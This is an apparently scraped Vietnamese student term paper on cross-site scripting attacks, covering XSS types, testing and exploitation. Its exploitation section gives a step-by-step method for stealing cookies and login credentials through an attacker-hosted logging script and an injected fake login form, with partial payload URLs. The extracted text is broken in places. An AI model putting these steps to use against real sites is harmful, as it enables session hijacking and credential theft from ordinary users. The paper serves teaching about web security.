Đăng ký Đăng nhập
Trang chủ Kỹ thuật - Công nghệ Điện - Điện tử Kĩ thuật tấn công cross site scripting (xss)...

Tài liệu Kĩ thuật tấn công cross site scripting (xss)

.PDF
27
134
100

Mô tả:

2. GIỚI THIỆU VỀ XSS ................................................................................................. 1 2.1. Tìm hiểu XSS.......................................................................................................... 1 2.1.1. XSS là gì? ......................................................................................................... 1 2.1.2. Làm thế nào chèn những đoạn mã JavaScript độc hại ..................................... 1 2.1.3. JavaScript độc hại là gì? ................................................................................... 2 2.1.4. Hậu quả của JavaScript độc hại ....................................................................... 2 2.1.5. Các tác nhân trong một cuộc tấn công XSS ..................................................... 3 2.1.6. Một ví dụ về kịch bản tấn công ........................................................................ 3 2.1.7. Thực hiện kịch bản tấn công như thế nào? ...................................................... 4 2.2. Các loại XSS ........................................................................................................... 4 2.2.1. Stored XSS ....................................................................................................... 4 2.2.2. Reflected XSS .................................................................................................. 5 2.2.3. DOM-based XSS .............................................................................................. 6 2.3. Mức độ nguy hiểm của XSS .................................................................................. 7 2.4. Mục tiêu mà XSS hướng tới. ................................................................................. 7 3. HOẠT ĐỘNG CỦA XSS ............................................................................................. 8 4. CẢNH GIÁC VỚI XSS ............................................................................................. 11 5. KIỂM TRA LỖI XSS ................................................................................................ 12 5.1. Sử dụng Tool ........................................................................................................ 12 5.2. Thử bằng Code ..................................................................................................... 12 6. KHAI THÁC LỖI XSS.............................................................................................. 14 6.1. Tóm tắt các bước thực hiện ................................................................................. 14 6.2. Các cách thực hiện ............................................................................................... 15 6.2.1. Nghiên cứu cách lấy cookies .......................................................................... 15 6.2.2. Nghiên cứu cách lấy account .......................................................................... 15 6.2.3. Tấn Công XSS Bằng Flash............................................................................. 16 6.3. Attacker dùng XSS để lừa đảo ............................................................................. 18 6.4. Cách vượt qua cơ chế lọc ký tự ........................................................................... 18 7. PHÒNG CHỐNG XSS .............................................................................................. 19 7.1. Với những dữ liệu người thiết kế và phát triển ứng dụng Web ......................... 19 7.2. Đối với người dùng. ............................................................................................. 21 8. PHẠM VI VÀ TÍNH KHẢ THI CỦA PHƯƠNG PHÁP TẤN CÔNG BẰNG XSS ..................................................................................................................................... 21 9. ĐÁNH GIÁ ................................................................................................................. 22 10. DEMO……………………………………………………………………………….
ĐẠI HỌC ĐÀ NẴNG TRƯỜNG ĐẠI HỌC BÁCH KHOA KHOA CÔNG NGHỆ THÔNG TIN Tel. (84-511) 736 949, Website: itf.ud.edu.vn, E-mail: [email protected] BÁO CÁO TIỂU LUẬN MÔN HỌC AN TOÀN VÀ BẢO MẬT THÔNG TIN MẠNG NGÀNH KHOA HỌC MÁY TÍNH ĐỀ TÀI : KĨ THUẬT TẤN CÔNG CROSS-SITE SCRIPTING (XSS) GVHD : TS. NGUYỄN TẤN KHÔI Nhóm HV : 1. LÊ ĐỨC THỌ 2. VÕ XUÂN LỢI Lớp Cao học KHMT Khóa 28 (2013  2015) ĐÀ NẴNG, 01/2015 MỤC LỤC 1. GIỚI THIỆU CHUNG ................................................................................................ 1 2. GIỚI THIỆU VỀ XSS ................................................................................................. 1 2.1. Tìm hiểu XSS.......................................................................................................... 1 2.1.1. XSS là gì? ......................................................................................................... 1 2.1.2. Làm thế nào chèn những đoạn mã JavaScript độc hại ..................................... 1 2.1.3. JavaScript độc hại là gì? ................................................................................... 2 2.1.4. Hậu quả của JavaScript độc hại ....................................................................... 2 2.1.5. Các tác nhân trong một cuộc tấn công XSS ..................................................... 3 2.1.6. Một ví dụ về kịch bản tấn công ........................................................................ 3 2.1.7. Thực hiện kịch bản tấn công như thế nào? ...................................................... 4 2.2. Các loại XSS ........................................................................................................... 4 2.2.1. Stored XSS ....................................................................................................... 4 2.2.2. Reflected XSS .................................................................................................. 5 2.2.3. DOM-based XSS .............................................................................................. 6 2.3. Mức độ nguy hiểm của XSS .................................................................................. 7 2.4. Mục tiêu mà XSS hướng tới. ................................................................................. 7 3. HOẠT ĐỘNG CỦA XSS ............................................................................................. 8 4. CẢNH GIÁC VỚI XSS ............................................................................................. 11 5. KIỂM TRA LỖI XSS ................................................................................................ 12 5.1. Sử dụng Tool ........................................................................................................ 12 5.2. Thử bằng Code ..................................................................................................... 12 6. KHAI THÁC LỖI XSS.............................................................................................. 14 6.1. Tóm tắt các bước thực hiện ................................................................................. 14 6.2. Các cách thực hiện............................................................................................... 15 6.2.1. Nghiên cứu cách lấy cookies .......................................................................... 15 6.2.2. Nghiên cứu cách lấy account.......................................................................... 15 6.2.3. Tấn Công XSS Bằng Flash............................................................................. 16 6.3. Attacker dùng XSS để lừa đảo ............................................................................. 18 6.4. Cách vượt qua cơ chế lọc ký tự ........................................................................... 18 7. PHÒNG CHỐNG XSS .............................................................................................. 19 7.1. Với những dữ liệu người thiết kế và phát triển ứng dụng Web ......................... 19 7.2. Đối với người dùng. ............................................................................................. 21 8. PHẠM VI VÀ TÍNH KHẢ THI CỦA PHƯƠNG PHÁP TẤN CÔNG BẰNG XSS ..................................................................................................................................... 21 9. ĐÁNH GIÁ ................................................................................................................. 22 10. DEMO……………………………………………………………………………….26 1. GIỚI THIỆU CHUNG Website ngày nay rất phức tạp và thường là các web động, nội dung của web được cập nhật thông qua các thành viên tham gia ở khắp mọi nơi trên thế giới. Và hầu hết các website này dùng Cookie để xác thực người dùng. Điều này đồng nghĩa với việc Cookie của ai thì người đó dùng, Nếu lấy được Cookie người dùng nào Hacker sẽ giả mạo được chính người dùng đó(điều này là hết sức nguy hiểm). Vậy làm sao để các hacker có thể lấy cookie của bạn? Có rất nhiều cách để các hacker làm việc đó, ở đây tôi xin trình bày một trong những cách mà hacker thường dùng, đó chính là họ nhờ vào lỗi Cross Site Scripting(XSS). Cross-Site Scripting (XSS) là một trong những kĩ thuật tấn công phổ biến nhất hiện nay, đồng thời nó cũng là một trong những vấn đề bảo mật quan trọng đối với các nhà phát triển web và cả những người sử dụng web. Bất kì một website nào cho phép người sử dụng đăng thông tin mà không có sự kiểm tra chặt chẽ các đoạn mã nguy hiểm thì đều có thể tiềm ẩn các lỗi XSS. XSS được thực hiện trên các thẻ JavaScript, và các thẻ JavaScript chúng có thể làm được những công việc sau: 1. Thay đổi cấu trúc của toàn bộ trang web. 2. Tạo tùy ý các phần tử HTML. 3. Định tuyến lại các hình thức liên kết 4. Phục hồi dữ liệu, xác thực 5. Gửi và nhận dữ liệu 6. Đọc các tổ hợp phím 2. GIỚI THIỆU VỀ XSS 2.1. Tìm hiểu XSS 2.1.1. XSS là gì? XSS là từ viết tắt của Cross-Site Scripting là một kĩ thuật tấn công bằng cách chèn vào các website động (ASP, PHP, CGI, JSP ...) những thẻ HTML hay những đoạn mã script nguy hiểm. Trong đó những đoạn mã nguy hiểm được chèn vào hầu hết được viết bằng ClientSite Script như javascript, Jscript, DHTML và cũng có thể là các thẻ HTML. XSS là một lỗi phổ biến, có rất nhiều trang web bị mắc phải lỗi này, chính vì thế ngày càng có nhiều người quan tâm đến lỗi này. 2.1.2. Làm thế nào chèn những đoạn mã JavaScript độc hại Cách duy nhất để những hacker thực thi mã JavaScript độc hại của mình trong trình duyệt của nạn nhân là chèn nó vào một trong những trang web mà các nạn nhân tải từ trang web. Điều này sẽ xảy ra nếu người dùng nhập trực tiếp thông tin vào trang web, bởi 1 vì sau đó hacker có thể chèn vào một chuỗi, đó sẽ được coi như mã của trình duyệt của nạn nhân. Trong ví dụ dưới đây, một server-side script đơn giản được sử dụng để hiển thị bình luận mới nhất trên một trang web: print print print print "" "Latest comment:" database.latestComment "" Các kịch bản giả định rằng một lời bình luận chỉ bao gồm các văn bản. Tuy nhiên, kể từ khi người dùng nhập trực tiếp, hacker có thể gửi bình luận này: " . Vậy là hacker đã thành công với cuộc tấn công của mình. 2.1.3. JavaScript độc hại là gì? Lúc đầu, khả năng thực thi JavaScript trong trình duyệt của người dùng không có vẻ đặc biệt nguy hiểm. Sau tất cả, JavaScript chạy trong một môi trường rất hạn chế có quyền truy cập rất hạn chế vào các tập tin của người dùng và hệ điều hành. Trong thực tế, người dùng có thể mở giao diện điều khiển JavaScript của trình duyệt và thực hiện bất kỳ JavaScript mà họ muốn, và họ sẽ rất khó có khả năng gây ra bất kỳ thiệt hại cho máy tính của bạn. Tuy nhiên, khả năng nguy hiểm của JavaScript trở nên rõ ràng hơn khi xem xét các sự kiện sau đây:  JavaScript có quyền truy cập vào một số thông tin nhạy cảm của người dùng, chẳng hạn như các tập tin cookie.  JavaScript có thể gửi yêu cầu HTTP với nội dung tùy ý tới các điểm đến tùy ý bằng cách sử dụng XMLHttpRequest và các cơ chế khác.  JavaScript có thể làm thay đổi tùy vào HTML của trang hiện tại bằng cách sử dụng phương pháp thao tác DOM. Những sự kiện này kết hợp có thể gây ra lỗ hổng bảo mật rất nghiêm trọng, sẽ giải thích sau. 2.1.4. Hậu quả của JavaScript độc hại Trong số rất nhiều những thứ khác, khả năng thực thi JavaScript trong trình duyệt của người dùng khác cho phép kẻ tấn công thực hiện các loại sau đây của các cuộc tấn công: 2 Trộm cắp Cookie Hacker có thể truy cập các tập tin cookie của nạn nhân liên quan đến những trang web sử dụng file cookie, gửi chúng đến máy chủ của của website người dùng, và sử dụng chúng để lấy thông tin nhạy cảm như ID. Keylogging Hacker có thể đăng ký một bàn phím lắng nghe sự kiện sử dụng addEventListener và sau đó gửi tất cả các thao tác bàn phím của người sử dụng đến máy chủ của mình, như mật khẩu và số thẻ tín dụng Lừa đảo Hacker có thể chèn một hình thức đăng nhập giả mạo vào trang web bằng cách sử dụng thao tác DOM, thiết lập thuộc tính action của form đến máy chủ của mình, và sau đó lừa người dùng vào gửi thông tin nhạy cảm. 2.1.5. Các tác nhân trong một cuộc tấn công XSS Trước khi mô tả một cách chi tiết làm thế nào một cuộc tấn công XSS hoạt động, chúng ta cần phải xác định các bên liên quan trong một cuộc tấn công XSS. Nói chung, một cuộc tấn công XSS liên quan đến ba tác nhân: các trang web, các nạn nhân, và những hacker.  Những website có dạng http://website/.  Cơ sở dữ liệu của website chứa những thông tin người dùng nhập vào website.  Nạn nhân là những người dùng bình thường của website mà yêu cầu họ truy cập những trang có hại ngay tại tình duyệt của mình.  Những kẻ tấn công là một người sử dụng độc hại của các trang web có ý định để khởi động một cuộc tấn công nạn nhân bằng cách khai thác một lỗ hổng XSS trong trang web.  Máy chủ của kẻ tấn công là một máy chủ web điều khiển bởi những kẻ tấn công với mục đích duy nhất là ăn cắp thông tin nhạy cảm của nạn nhân. 2.1.6. Một ví dụ về kịch bản tấn công Trong ví dụ này, chúng ta sẽ cho rằng mục tiêu cuối cùng của kẻ tấn công là để ăn cắp cookie của nạn nhân bằng cách khai thác một lỗ hổng XSS trong trang web. Điều này có thể được thực hiện bằng cách trình duyệt của nạn nhân phân tích mã HTML sau đây Kịch bản này điều hướng trình duyệt của người dùng đến một URL khác nhau, gây ra một yêu cầu HTTP đến máy chủ của kẻ tấn công. URL bao gồm các tập tin cookie của nạn nhân như một tham số truy vấn, trong đó kẻ tấn công có thể trích xuất từ yêu cầu khi nó đến với máy chủ của mình. Một khi kẻ tấn công đã có các tập tin cookie, họ có thể sử dụng chúng để mạo danh các nạn nhân và khởi động nhiều cuộc tấn công hơn nữa. 3 Từ bây giờ, các mã HTML trên sẽ được gọi là chuỗi độc hại hoặc các đoạn mã độc hại. Điều quan trọng cần lưu ý là chuỗi đó chỉ là độc hại nếu nó cuối cùng được phân tích dưới dạng HTML trong trình duyệt của nạn nhân, mà chỉ có thể xảy ra như là kết quả của một lỗ hổng XSS trong trang web 2.1.7. Thực hiện kịch bản tấn công như thế nào? Biểu đồ dưới đây minh họa cách tấn công ví dụ này có thể được thực hiện bởi một kẻ tấn công: 1. Hacker sử dụng một trong các hình thức của trang web để chèn một chuỗi độc hại vào cơ sở dữ liệu của trang web. 2. Nạn nhân yêu cầu một trang từ trang web. 3. Trang web này bao gồm các chuỗi độc hại từ cơ sở dữ liệu trong các phản ứng và gửi nó đến các nạn nhân. 4. Trình duyệt của nạn nhân thực thi các đoạn mã độc hại bên trong phản ứng, gửi các tập tin cookie của nạn nhân vào máy chủ của kẻ tấn công. 2.2. Các loại XSS Trong khi mục tiêu của một cuộc tấn công XSS luôn luôn thực thi JavaScript độc hại trong trình duyệt của nạn nhân, có một số cách cơ bản khác nhau để đạt được mục tiêu đó. Các cuộc tấn công XSS thường được chia thành ba loại: 2.2.1. Stored XSS Stored XSS là hình thức tấn công mà ở đó cho phép kẻ tấn công có thể chèn một đoạn script nguy hiểm (thường là Javascript) vào website của chúng ta thông qua một chức năng nào đó (vd: viết lời bình, guestbook, gởi bài..), để từ đó khi các thành viên 4 khác truy cập website sẽ bị dính mã độc từ kẻ tấn công này, các mã độc này thường được lưu lại trong database của website chúng ta nên gọi là Stored. Stored XSS phát sinh do chúng ta không lọc dữ liệu do thành viên gởi lên một cách đúng đắn, khiến cho mã độc được lưu vào Database của website. 2.2.2. Reflected XSS Trong một cuộc tấn công Reflected XSS, chuỗi độc hại là một phần của yêu cầu của nạn nhân đến trang web. Trang web sẽ chứa chuỗi độc hại này trong các phản hồi được gửi lại cho người sử dụng. Biểu đồ dưới đây minh họa kịch bản này: 1. Kẻ tấn công tạo ra một URL có chứa một chuỗi độc hại và gửi nó đến các nạn nhân. 5 2. Kẻ tấn công lừa nạn nhân, yêu cầu nạn nhận truy cập URL chứa chuỗi độc hại từ trang web. 3. Trang web này bao gồm các chuỗi độc hại từ các URL trong các phản hồi. 4. Trình duyệt của nạn nhân thực thi các đoạn mã độc hại bên trong phản hồi, gửi các tập tin cookie của nạn nhân vào máy chủ của kẻ tấn công. 2.2.3. DOM-based XSS DOM-based XSS là một biến thể của cả Stored XSS và Reflected XSS. Trong một cuộc tấn công DOM-based XSS, chuỗi độc hại không thực sự phân tích bằng trình duyệt của nạn nhân cho đến khi JavaScript hợp pháp của trang web được thực hiện. Biểu đồ dưới đây minh họa kịch bản này cho một cuộc tấn công XSS phản ánh: 1. Kẻ tấn công tạo ra một URL chứa chuỗi độc hại và gửi nó đến nạn nhân. 2. Kẻ tấn công lừa nạn nhân thực hiện một yêu cầu truy cập đến URL này từ trang web. 3. Website nhận được yêu cầu, nhưng không bao gồm chuỗi độc hị tỏng phản hồi. 4. Trình duyệt của nạn nhân thực thi mã script hợp pháp bên trong phản hồi, gây nên việc mã độc hại được chèn vào trang web. 5. Trình duyệt của nạn nhân thực thi mã độc hại được chèn vào trang, và gửi file cookies của nạn nhân đến máy chủ của kẻ tấn công. 6 2.3. Mức độ nguy hiểm của XSS Theo thống kê về các lỗ hổng bảo mật thường bị tấn công nhất vào năm 2009 Cross-Site Scripting (XSS) chiếm một tỉ lệ rất cao so với các phương pháp tấn công khác. Kĩ thuật XSS được mô tả lần đầu tiên cách đây 5 năm (từ năm 2007 đến 2011) và hầu hết các khả năng tiềm ẩn của kĩ thuật này đã được biết đến. Tuy nhiên chúng ta mới chỉ khắc phục được một phần của nó. Không phải vô tình mà Yahoo Mail lại để sót một lỗi XSS trong bộ lọc của mình. Một phương pháp tối ưu vẫn còn đang ở phía trước. 2.4. Mục tiêu mà XSS hướng tới. XSS khai thác thường được sử dụng để đạt được các kết quả độc hại sau đây: 7 * Truy cập thông tin nhạy cảm hoặc bị hạn chế * Ăn cắp tiền (giao dịch ngân hàng, mua hàng online….) * Theo dõi thói quen lướt web của người dùng * Thay đổi năng của trình duyệt * Bôi nhọ danh tiếng của một cá nhân hay công ty * Hủy hoại ứng dụng Web. * Tấn công từ chối dịch vụ ... 3. HOẠT ĐỘNG CỦA XSS XSS cho phép attacker chèn các đoạn mã vào link của đường dẫn, để thực hiện trên trình duyệt của người dùng, dẫn đến việc mất cookies, mật khẩu, session hay chèn virus… Thường thì XSS có dạng như sau: http://www.xxx.vn//index.php?pg=news&cat=. 8 Và nội dung xuất hiện trên trình duyệt là một cái popup có thông tin là „Lỗi XSS‟. Ở trên ví dụ 1 trên chỉ minh họa một cách đơn giản là thêm đoạn mã của mình vào trang Web thông qua URL. Nhưng thực sự thì có rất nhiều cách để thêm đoạn mã JavaScript với mục đích tấn công kiểu XSS. Hacker có thể dễ dàng lợi dụng Document Object Model (DOM) để thay đổi ngữ cảnh và nội dụng Web ứng dụng. Ví dụ 2: Sau đây là danh sách nơi có thể chèn đoạn mã:
& &{[code]}; --====_ABC0987654321DEF_====---====_ABC1234567890DEF_==== Content-Type: audio/x-wav; name="filename.ext.ext" Content-Transfer-Encoding: base64 Content-ID: Đôi khi đang đọc thư bạn bị chuyển sang một website khác, bạn có nghĩ rằng bạn có thể mất mật khẩu. Trước đây, hàng loạt các hộp thư của Yahoo bị mất mật khẩu hay bị đọc trộm thư mà không rõ nguyên nhân. Có lẽ khi đó các bạn mở các bức thư mà không hề cảnh giác với XSS, đâu phải chỉ các file đính kèm mới có thể gây nguy hiểm cho bạn. Chỉ cần với một đoạn mã HTML gửi trong thư bạn đã hoàn toàn bị mất cookie của mình.
Vậy là khi bạn nhận thư, và nếu bạn vô tình đưa con chuột qua bức ảnh gửi kèm thì cũng có nghĩa là bạn đã bị lấy mất cookie. Và với cookie lấy được, các hacker có thể dễ dàng login hòm thư của bạn mà không cần biết mật khẩu của bạn. Thực sự tôi cũng rất bất ngờ khi tìm thấy rằng Yahoo khi đó đã ngăn được hầu hết các mối đe doạ từ các thẻ HTML lại bỏ qua thẻ IMG. Tuy nhiên cho tới ngày 12/7/2003 Yahoo đã kịp thời vá lỗ 11 hồng nghiêm trọng này, nhưng không phải vì vậy mà bạn mất cảnh giác với những "lỗi" của website. Nếu như bạn gặp một liên kết có dạng: http://example.com/s...document.cookie) Chắc chắn bạn sẽ phải xem xét kĩ trước khi click vào. Có thể là sẽ tắt JavaScript cho trình duyệt của bạn trước khi click vào hay ít nhất cũng có một chút cảnh giác. Nhưng nếu bạn gặp một liên kết như thế này thì sao: http://example.com/s...72%79%3D  &{alert('CSS Vulnerable') };  Ví dụ 4: Thông báo cho biết chắc chắn web đã bị lỗi XSS. 13 Nhưng xin chú ý , thỉnh thoảng vẫn có trường hợp website đó bị dính XSS nhưng vẫn không xuất hiện cái popup thì buộc lòng bạn phải VIEW SOURCES (mổ bụng) nó ra để xem . Khi view sources nhớ kiếm dòng này < script>alert('XSS)< /script> , nếu có thì chắc chắn là website đó lỗi XSS 100%. Gọi http://websitebiloi.com/ là site bị dính lỗi XSS và ta tìm được nơi bị lỗi như thế này : http://websitebiloi.com/index.php?page= nghĩa là ta có thể chèn code ngay trên thanh ADDRESS. Bước 5: Lên kế hoạch kịch bản tấn công 6. KHAI THÁC LỖI XSS Khác với các lỗi khác là gây hại trực tiếp lên hệ thống chứa web site, còn XSS lại không gây hại đến hệ thống của sever mà đối tượng tấn công chủ yếu của XSS lại là người dùng! Ứng dụng Web thường lưu trữ thông tin quan trọng ở cookie. Cookie là mẩu thông tin mà ứng dụng lưu trên đĩa cứng của người sử dụng. Nhưng chỉ ứng dụng thiết lập ra cookie thì mới có thể đọc nó. Do đó chỉ khi người dùng đang trong phiên làm việc của ứng dụng thì hacker mới có cơ hội đánh cắp cookie. Công việc đầu tiên của hacker là tìm trang đích để dụ người dùng đăng nhập sau khi đã tìm ra lỗ hổng trên ứng dụng đó. Sau đây là các bước khai thác XSS theo truyền thống: 6.1. Tóm tắt các bước thực hiện 14 Bước 1: Hacker biết được người dùng đang sử dụng một ứng dụng Web có lỗ hỏng XSS. Bước 2: Người dùng nhận được 1 liên kết thông qua email hay trên chính trang Web (như trên guestbook, banner dễ dàng thêm 1 liên kết do chính hacker tạo ra…). Thông thường hacker khiến người dùng chú ý bằng những câu kích thích sự tò mò của người dùng như “ Kiểm tra tài khoản”, “Một phần thưởng hấp dẫn đang chờ bạn”… Bước 3: Chuyển nội dung thông tin (cookie, tên, mật khẩu…) về máy chủ của hacker. Bước 4: Hacker tạo một chương trình cgi (ở ví dụ 3 này là steal.cgi) hoặc một trang Web để ghi nhận những thông tin đã đánh cắp vào 1 tập tin Bước 5: Sau khi nhận được thông tin cần thiết, hacker có thể sử dụng để thâm nhập vào tài khoản của người dùng. 6.2. Các cách thực hiện Để hiểu rõ hơn về các tấn công XSS chúng ta xem xét ví dụ thực tế sau: 6.2.1. Nghiên cứu cách lấy cookies Thứ nhất: Bạn hãy tạo một file info.txt và upload lên host của bạn. Thứ hai: Tạo file cookie.asp hoặc cookie.php có nội dung sau và upload file này lên host của bạn như sau: Thứ ba: Trên những phần trả lời hay góp ý trên diễn đàn hoặc email hoặc website (bị lỗi XSS) chúng ta để một link có lời giới thiệu hay thông báo gây chú ý (có hostname là của trang web bị nhiễm XSS) dạng như sau : http:// hostxss.com /search.cgi?query= hoặc http:// hostxss.com /search.cgi?%71%75...72%69%70%74%3E (đã được mã hóa) 6.2.2. Nghiên cứu cách lấy account Thứ nhất: Bạn hãy tạo một file info.txt và upload lên host của bạn. Thứ hai: Tạo thêm một file xss.js và cũng upload file này lên host của bạn: 15 File này là để tạo ra một facesite (trang web giả giống trang web thật) để khi người dùng nhập username và password thì chúng ta sẽ điều hướng và lưu thông tin trên file info.txt. document.body.innerHTML=„ VieclamBank


Thông tin đăng nhập
Tên đăng nhập:
Mật khẩu:
' Thứ ba: Chúng ta để một link có lời giới thiệu hay thông báo gây chú ý (có hostname là của trang web bị nhiễm XSS) . Khi đó tạo một link dạng như sau và gửi mail hay up link lên trang web có nhiễm XSS: (sau hostname ta thêm thẻ Script vào) http:// hostxss.com /search.php?s=">

Thư viện tài liệu trực tuyến
Hỗ trợ
[email protected]
hotro_xemtailieu
Mạng xã hội
Copyright © 2023 Xemtailieu - Website đang trong thời gian thử nghiệm, chờ xin giấy phép của Bộ TT & TT
thư viện tài liệu trực tuyến, nơi chia sẽ trao đổi tài liệu như luận văn đồ án, giáo trình, đề thi, .v.v...Kho tri thức trực tuyến.
Xemtailieu luôn tôn trọng quyền tác giả và thực hiện nghiêm túc gỡ bỏ các tài liệu vi phạm.